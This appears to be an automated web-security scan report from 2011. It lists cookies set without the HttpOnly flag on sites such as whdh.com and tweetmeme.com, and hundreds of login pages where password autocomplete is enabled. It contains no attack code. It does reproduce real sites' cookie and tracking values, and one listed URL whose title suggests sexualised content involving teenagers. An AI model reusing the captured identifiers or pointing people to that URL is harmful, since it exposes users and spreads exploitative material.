Set-Cookie: BLITZEN-2702=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2704=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2706=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2708=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2710=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2712=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2714=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2716=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2718=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2720=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2722=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2800=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2802=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2804=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2806=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2808=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2810=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2812=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2814=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2816=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2818=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2820=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2822=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2900=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2902=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2904=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2906=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2908=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2910=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2912=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2914=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2916=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2918=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2920=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2922=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-3000=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-3002=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-3004=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-3006=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-3008=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-3010=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-3012=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-3014=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-3016=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-3018=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-3020=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-3022=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2600=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2602=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2604=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2606=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2608=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2610=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2612=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2614=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2616=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2618=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2620=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2622=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2700=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2702=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2704=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2706=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2708=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2710=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2712=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2714=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2716=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2718=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2720=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2722=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2800=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2802=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2804=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2806=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2808=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2810=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2812=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2814=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2816=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2818=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2820=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2822=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2900=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2902=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2904=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2906=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2908=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2910=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2912=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2914=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2916=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2918=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2920=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-2922=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-3000=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-3002=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-3004=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-3006=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-3008=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-3010=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-3012=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-3014=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-3016=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-3018=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-3020=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: BLITZEN-3022=; path=/; expires=Tuesday, 01-Jan-80 00:00:01 GMT
Set-Cookie: zshopurl=z%2fnetlingo; path=/
Set-Cookie: pis=1; path=/;
Set-Cookie: zm=AQABAAAA8wcAABTXMn3ZESMf_AapOt_c2LHphBNXMA5JPfT6gZUI8wuNU5G32qzfW8UK7aCUTmf44ZhwGkV-w3TWOo4zf3L1feOR19CmSKUwC-KzmxCF9Gui0H3lxIuicTJIjx3R9nwAzZSnJmkR; domain=.zazzle.com; path=/
Set-Cookie: zs=255EC80F-9BB5-440C-9150-9CB65A7DE4C8%7c0%7c12940404058%7c; domain=.zazzle.com; expires=Tue, 01-Jan-2036 08:00:00 GMT; path=/
Set-Cookie: us=98B57018-41A2-4493-8838-36A22CB611B1; domain=.zazzle.com; expires=Tue, 01-Jan-2036 08:00:00 GMT; path=/
Set-Cookie: general%5Fmaturity=1; domain=.zazzle.com; path=/
Set-Cookie: s=5246001291012673539; path=/
Date: Tue, 25 Jan 2011 04:40:58 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html><head><link rel="stylesheet" type="text/css" href="http://www.zazzle.co
...[SNIP]...

14.938. http://www1.whdh.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

WHDHSTR=b67ab8cd4dbb526d8d29bbf7eb21f1ca; expires=Wed, 25-Jan-2012 21:54:00 GMT; path=/; domain=.whdh.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.939. http://xads.zedo.com/ads3/a previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://xads.zedo.com
Path:	/ads3/a

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

FFgeo=5386156; path=/; EXPIRES=Wed, 25-Jan-12 00:11:14 GMT; DOMAIN=.zedo.com
ZEDOIDA=jgHX0goAACQAAH@dLJYAAAKY~012511; path=/; expires=Fri, 22-Jan-21 00:11:14 GMT; domain=.zedo.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ads3/a HTTP/1.1
Host: xads.zedo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.940. http://xfactor.tweetmeme.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://xfactor.tweetmeme.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

tm_identity=a4d8db2993601638d04abd7579c4807a; expires=Tue, 01-Feb-2011 04:40:45 GMT; path=/; domain=.tweetmeme.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: xfactor.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.941. http://yoga.tweetmeme.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://yoga.tweetmeme.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

tm_identity=dc2ca952c1c37e52f76eb77141d10a94; expires=Tue, 01-Feb-2011 04:40:54 GMT; path=/; domain=.tweetmeme.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: yoga.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.942. http://youtube.tweetmeme.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://youtube.tweetmeme.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

tm_identity=94b6566617ce940cd794bf1274e16135; expires=Tue, 01-Feb-2011 04:41:00 GMT; path=/; domain=.tweetmeme.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: youtube.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

15. Password field with autocomplete enabled previous next
There are 346 instances of this issue:

https://acc.newsguy.com/cgi-bin/login_frm
https://acc.newsguy.com/user/accnt_settings
https://billing.cloudaccess.net/cart.php
https://billing.cloudaccess.net/clientarea.php
https://billing.cloudaccess.net/clientarea.php
https://billing.cloudaccess.net/domainchecker.php
https://billing.cloudaccess.net/knowledgebase.php
https://billing.cloudaccess.net/knowledgebase/10/Managing-your-account
https://billing.cloudaccess.net/knowledgebase/12/Cloud-Control-Panel
https://billing.cloudaccess.net/knowledgebase/13/Images
https://billing.cloudaccess.net/knowledgebase/14/Article-Manager
https://billing.cloudaccess.net/knowledgebase/15/Support
https://billing.cloudaccess.net/knowledgebase/28/How-to-change-your-domain-name.html
https://billing.cloudaccess.net/knowledgebase/38/How-to-upgrade-your-demo-site.html
https://billing.cloudaccess.net/submitticket.php
https://billing.cloudaccess.net/submitticket.php
https://bugzilla.mozilla.org/show_bug.cgi
https://bugzilla.mozilla.org/show_bug.cgi
https://bugzilla.mozilla.org/show_bug.cgi
https://bugzilla.mozilla.org/show_bug.cgi
http://community.joomla.org/login.html
http://community.joomla.org/showcase/
http://community.joomla.org/showcase/how-to-submit-a-site.html
http://community.joomla.org/showcase/sites-of-the-month.html
http://community.joomla.org/showcase/sites/advsearch.html
http://community.joomla.org/showcase/sites/new.html
http://community.joomla.org/user-groups.html
http://demo16.cloudaccess.net/
http://demo16.cloudaccess.net/administrator/index.php
http://disqus.com/profile/login/
http://docs.joomla.org/index.php
http://extensions.joomla.org/
http://extensions.joomla.org/extensions
http://extensions.joomla.org/extensions/advanced-search
http://extensions.joomla.org/extensions/languages/translations-for-joomla
http://extensions.joomla.org/extensions/new
http://fastdial.com/
http://fastdial.com/0
http://fastdial.com/user
http://fastdial.com/website
http://fastdial.com/welcome-fast-dial-firefox-4
http://forum.joomla.org/
http://forum.joomla.org/ucp.php
http://forum.joomla.org/viewforum.php
http://forumas.lithuanianjoomla.com/
http://forums.freebsd.org/
http://help.tweetmeme.com/
http://help.tweetmeme.com/2009/04/07/api-documentation/
http://help.tweetmeme.com/2009/04/09/rss-feeds/
http://help.tweetmeme.com/2009/04/09/twitter-feeds/
http://help.tweetmeme.com/contact/
http://help.tweetmeme.com/forum/forum/33
http://help.tweetmeme.com/language/
http://it.toolbox.com/blogs/database-soup
http://it.toolbox.com/blogs/database-talk
http://it.toolbox.com/blogs/db2luw
http://it.toolbox.com/blogs/db2zos
http://it.toolbox.com/blogs/elsua
http://it.toolbox.com/blogs/juice-analytics
http://it.toolbox.com/blogs/minimalit
http://it.toolbox.com/blogs/penguinista-databasiensis
http://it.toolbox.com/blogs/ppmtoday
http://joomlacode.org/gf/account/
http://my.joomla.org/
http://netvouz.com/action/submitBookmark
http://newsguy.com/
http://people.joomla.org/
http://people.joomla.org/
http://people.joomla.org/groups/viewdiscussion/996-Joomla..%2016%20Has%20Arrived.html
http://resources.joomla.org/
http://resources.joomla.org/directory/advsearch.html
http://resources.joomla.org/directory/new.html
http://resources.joomla.org/how-to-add-listings.html
http://slashdot.org/bookmark.pl
http://slashdot.org/bookmark.pl
http://spongecell.com/event_list
http://themehybrid.com/
http://themehybrid.com/themes/shadow
http://twitter.com/
http://twitter.com/7News/
http://twitter.com/7News/newsteam
http://twitter.com/7news
http://twitter.com/LizPW/
http://twitter.com/cw56
http://twitter.com/datasift
http://twitter.com/joomla
http://twitter.com/kontentdesign
http://twitter.com/nbc/primetime
http://twitter.com/netlingo
http://twitter.com/spies_assassins
http://twitter.com/tweetmeme
http://twitter.com/typekit
http://twitter.com/ups
http://venedet.michnica.net/index.php/joomla/1-joomla-16-je-tu
http://wordpress.org/extend/plugins/tweetmeme-follow-button/
http://wordpress.org/extend/plugins/tweetmeme/
http://wordpress.org/extend/plugins/wp-pagenavi/
http://www.adside.com/adside/advertiser.html
http://www.adside.com/adside/publisher.html
http://www.americascupmedia.com/index.php
http://www.barkerstores.com/soundings/
https://www.bmwusa.com/Secured/Content/Forms/Login.aspx
http://www.cloudaccess.net/client-login.html
http://www.dedipower.com/
http://www.dynamicdrive.com/forums/showthread.php
http://www.eraser.ee/uudised/joomla/329-joomla-16-on-saabunud.html
http://www.facebook.com/
http://www.facebook.com/
http://www.facebook.com/%s
http://www.facebook.com/2008/fbml
http://www.facebook.com/7NEWS
http://www.facebook.com/LIMEprpromo
http://www.facebook.com/abid.bahloul
http://www.facebook.com/apps/application.php
http://www.facebook.com/beirutcityguide
http://www.facebook.com/connect/connect.php
http://www.facebook.com/miofeghali
http://www.facebook.com/paty.kfoury
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/profile.php
http://www.facebook.com/sharer.php
https://www.google.com/accounts/Login
https://www.google.com/accounts/ServiceLogin
http://www.heroturko.org/n/Nonude-Young-and-Beauty-Pretty-Girl-teen-NN-usenet-binaries/x22
http://www.homes.com/
http://www.id-joomla.com/berita-joomla/648-joomla-16-telah-datang
http://www.joomla.org/login.html
http://www.joomla.org.tw/news/joomla-official-news/163-joomla16-arrived
http://www.joomlacommunity.eu/nieuws/joomla-versies/572-joomla-16-nu-beschikbaar.html
http://www.joomlacorner.com/joomla-news/608-joomla-16-has-arrived.html
http://www.joomlainorge.no/nyheter/joomla/552-joomlar-16-er-utgitt
http://www.linkagogo.com/go/AddNoPopup
http://www.lithuanianjoomla.com/
http://www.lithuanianjoomla.com/7-joomla-naujienos/70-joomla-160-isleista.html
http://www.lithuanianjoomla.com/apie-joomla.html
http://www.lithuanianjoomla.com/component/users/
http://www.lithuanianjoomla.com/component/users/
http://www.lithuanianjoomla.com/index.php
http://www.lithuanianjoomla.com/joomla-naujienos.html
http://www.lithuanianjoomla.com/joomla-naujienos/2-laikas-isrinkti-geriausia-pasaulyje-tvs.html
http://www.lithuanianjoomla.com/joomla-naujienos/3-lithuanianjoomlacom-logotipo-konkursas.html
http://www.lithuanianjoomla.com/joomla-naujienos/4-lietuviskas-joomla-puslapis-lithuanianjoomlacom.html
http://www.lithuanianjoomla.com/joomla-naujienos/5-pirmasis-joomla-gimtadienis.html
http://www.lithuanianjoomla.com/joomla-naujienos/6-joomla-vel-laimejo-geriausios-tvs-apdavanojimus.html
http://www.lithuanianjoomla.com/joomla-naujienos/65-joomla-1522-versija-istaiso-saugumo-spraga.html
http://www.lithuanianjoomla.com/joomla-naujienos/67-joomla-16-rc1-versija.html
http://www.lithuanianjoomla.com/joomla-naujienos/68-joomla-sveikinimas-sv-kaledu-ir-naujuju-metu-proga.html
http://www.lithuanianjoomla.com/joomla-naujienos/69-lithuanianjoomlacom-atnaujinama.html
http://www.lithuanianjoomla.com/joomla-naujienos/70-joomla-16-isleista.html
http://www.lithuanianjoomla.com/joomla-naujienos/71-lietuviu-kalba-joomla-16-versijai.html
http://www.lithuanianjoomla.com/joomla-sasajos.html
http://www.lithuanianjoomla.com/joomla-saugumas.html
http://www.lithuanianjoomla.com/joomla-versijos.html
http://www.lithuanianjoomla.com/kaip-idiegti-joomla.html
http://www.lithuanianjoomla.com/kontaktai.html
http://www.lithuanianjoomla.com/lithuanianjoomlacom-misija.html
http://www.lithuanianjoomla.com/lithuanianjoomlacom-vizija.html
http://www.lithuanianjoomla.com/naujienos.html
http://www.lithuanianjoomla.com/saugi-joomla.html
http://www.lithuanianjoomla.com/saugi-joomla/75-kas-yra-saugus-patikimas-pilnas-joomla-turinio-valdymo-sistemos-paketas.html
http://www.livejournal.com/update.bml
http://www.livejournal.com/update.bml
http://www.myspace.com/netlingo
http://www.nbc.com/
http://www.netlingo.com/login.php
http://www.netlingo.com/register-premium.php
http://www.netlingo.com/register.php
http://www.networkworld.com/news/2010/100710-ebay-deploys-joomla-for-analytics.html
http://www.noreastermagazine.com/
http://www.paperg.com/
https://www.paperg.com/post.php
https://www.paperg.com/post.php
http://www.playshakespeare.com/
http://www.regattaregatta.com/
http://www.rockettheme.com/
http://www.shape.com/workouts/articles/blood_sugar.html
http://www.shape.com/workouts/articles/workout_schedule.html
http://www.svenskjoomla.se/index.php
http://www.thefeast.com/boston/
http://www.thefeast.com/boston/
http://www.thefeast.com/boston/Better-Yourself-Get-Smart-with-Our-Cheap-Picks-114487719.html
http://www.thefeast.com/boston/Better-Yourself-Get-Smart-with-Our-Cheap-Picks-114487719.html
http://www.thefeast.com/boston/Trailer-Park-Boys-Bring-Trash-Talk-at-The-Wilbur-114477904.html
http://www.thefeast.com/boston/Trailer-Park-Boys-Bring-Trash-Talk-at-The-Wilbur-114477904.html
http://www.thefeast.com/boston/shopping/FEAST-SHOP-BOS-A-Puffer-Never-Looked-So-Cute-114479944.html
http://www.thefeast.com/boston/shopping/FEAST-SHOP-BOS-A-Puffer-Never-Looked-So-Cute-114479944.html
http://www.usaca.info/
http://www.w-w-i.com/
http://www.w-w-i.com/velux_5_oceans_2010_race/
http://www.woothemes.com/
http://www.x64bitdownload.com/
http://www.x64bitdownload.com/64-bit-archive-downloads.html
http://www.x64bitdownload.com/64-bit-assembling-downloads.html
http://www.x64bitdownload.com/64-bit-atom-downloads.html
http://www.x64bitdownload.com/64-bit-audio-downloads.html
http://www.x64bitdownload.com/64-bit-automatic-downloads.html
http://www.x64bitdownload.com/64-bit-autoposter-downloads.html
http://www.x64bitdownload.com/64-bit-binaries-downloads.html
http://www.x64bitdownload.com/64-bit-binary-downloader-downloads.html
http://www.x64bitdownload.com/64-bit-binary-downloads.html
http://www.x64bitdownload.com/64-bit-board-downloads.html
http://www.x64bitdownload.com/64-bit-boards-downloads.html
http://www.x64bitdownload.com/64-bit-client-downloads.html
http://www.x64bitdownload.com/64-bit-commander-downloads.html
http://www.x64bitdownload.com/64-bit-community-downloads.html
http://www.x64bitdownload.com/64-bit-complex-downloads.html
http://www.x64bitdownload.com/64-bit-conference-downloads.html
http://www.x64bitdownload.com/64-bit-cross-downloads.html
http://www.x64bitdownload.com/64-bit-download-downloads.html
http://www.x64bitdownload.com/64-bit-downloader-downloads.html
http://www.x64bitdownload.com/64-bit-explorer-downloads.html
http://www.x64bitdownload.com/64-bit-ext2fs-ext3fs-paragon-extbrowser-downloads.html
http://www.x64bitdownload.com/64-bit-fast-download-downloads.html
http://www.x64bitdownload.com/64-bit-feed-downloads.html
http://www.x64bitdownload.com/64-bit-feedreader-downloads.html
http://www.x64bitdownload.com/64-bit-file-grabber-downloads.html
http://www.x64bitdownload.com/64-bit-file-sharing-downloads.html
http://www.x64bitdownload.com/64-bit-firefox-downloads.html
http://www.x64bitdownload.com/64-bit-forum-c-44-newsgroup-clients-downloads.html
http://www.x64bitdownload.com/64-bit-forum-downloads.html
http://www.x64bitdownload.com/64-bit-forums-downloads.html
http://www.x64bitdownload.com/64-bit-google-groups-downloads.html
http://www.x64bitdownload.com/64-bit-grabber-downloads.html
http://www.x64bitdownload.com/64-bit-group-downloads.html
http://www.x64bitdownload.com/64-bit-groups-downloads.html
http://www.x64bitdownload.com/64-bit-highspeed-connection-downloads.html
http://www.x64bitdownload.com/64-bit-image-grabber-downloads.html
http://www.x64bitdownload.com/64-bit-images-downloads.html
http://www.x64bitdownload.com/64-bit-internet-c-44-newsgroup-clients-downloads.html
http://www.x64bitdownload.com/64-bit-internet-downloads.html
http://www.x64bitdownload.com/64-bit-kill-file-downloads.html
http://www.x64bitdownload.com/64-bit-killfile-downloads.html
http://www.x64bitdownload.com/64-bit-mp3-downloads.html
http://www.x64bitdownload.com/64-bit-multimedia-downloads.html
http://www.x64bitdownload.com/64-bit-multipart-downloads.html
http://www.x64bitdownload.com/64-bit-news-c-44-newsgroup-clients-downloads.html
http://www.x64bitdownload.com/64-bit-news-downloads.html
http://www.x64bitdownload.com/64-bit-news-reader-downloads.html
http://www.x64bitdownload.com/64-bit-newsfeed-downloads.html
http://www.x64bitdownload.com/64-bit-newsgroup-c-44-newsgroup-clients-downloads.html
http://www.x64bitdownload.com/64-bit-newsgroup-downloads.html
http://www.x64bitdownload.com/64-bit-newsgroups-c-44-newsgroup-clients-downloads.html
http://www.x64bitdownload.com/64-bit-newsgroups-downloads.html
http://www.x64bitdownload.com/64-bit-newsreader-c-44-newsgroup-clients-downloads.html
http://www.x64bitdownload.com/64-bit-newsreader-downloads.html
http://www.x64bitdownload.com/64-bit-nntp-c-44-newsgroup-clients-downloads.html
http://www.x64bitdownload.com/64-bit-nntp-downloads.html
http://www.x64bitdownload.com/64-bit-nzb-downloads.html
http://www.x64bitdownload.com/64-bit-ozum-downloads.html
http://www.x64bitdownload.com/64-bit-par-downloads.html
http://www.x64bitdownload.com/64-bit-podcast-downloads.html
http://www.x64bitdownload.com/64-bit-posts-downloads.html
http://www.x64bitdownload.com/64-bit-rar-downloads.html
http://www.x64bitdownload.com/64-bit-reader-c-44-newsgroup-clients-downloads.html
http://www.x64bitdownload.com/64-bit-reader-downloads.html
http://www.x64bitdownload.com/64-bit-reading-downloads.html
http://www.x64bitdownload.com/64-bit-rss-c-44-newsgroup-clients-downloads.html
http://www.x64bitdownload.com/64-bit-rss-client-downloads.html
http://www.x64bitdownload.com/64-bit-rss-downloads.html
http://www.x64bitdownload.com/64-bit-rss-feed-reader-downloads.html
http://www.x64bitdownload.com/64-bit-rss-reader-downloads.html
http://www.x64bitdownload.com/64-bit-search-downloads.html
http://www.x64bitdownload.com/64-bit-ssl-downloads.html
http://www.x64bitdownload.com/64-bit-synchronization-downloads.html
http://www.x64bitdownload.com/64-bit-synchronize-downloads.html
http://www.x64bitdownload.com/64-bit-topic-downloads.html
http://www.x64bitdownload.com/64-bit-troll-downloads.html
http://www.x64bitdownload.com/64-bit-troll-killer-downloads.html
http://www.x64bitdownload.com/64-bit-trollkiller-downloads.html
http://www.x64bitdownload.com/64-bit-use-next-downloads.html
http://www.x64bitdownload.com/64-bit-usenet-c-44-newsgroup-clients-downloads.html
http://www.x64bitdownload.com/64-bit-usenet-downloads.html
http://www.x64bitdownload.com/64-bit-usenet-search-engine-downloads.html
http://www.x64bitdownload.com/64-bit-usenext-downloads.html
http://www.x64bitdownload.com/64-bit-video-downloads.html
http://www.x64bitdownload.com/64-bit-xpat-downloads.html
http://www.x64bitdownload.com/64-bit-yenc-downloads.html
http://www.x64bitdownload.com/a-oz-insight-1768-downloads.html
http://www.x64bitdownload.com/categories/free-64-bit-audio-multimedia-downloads-1-0-d.html
http://www.x64bitdownload.com/categories/free-64-bit-business-downloads-2-0-d.html
http://www.x64bitdownload.com/categories/free-64-bit-communications-chat-instant-messaging-downloads-3-39-0-d.html
http://www.x64bitdownload.com/categories/free-64-bit-communications-dial-up-connection-tools-downloads-3-40-0-d.html
http://www.x64bitdownload.com/categories/free-64-bit-communications-downloads-3-0-d.html
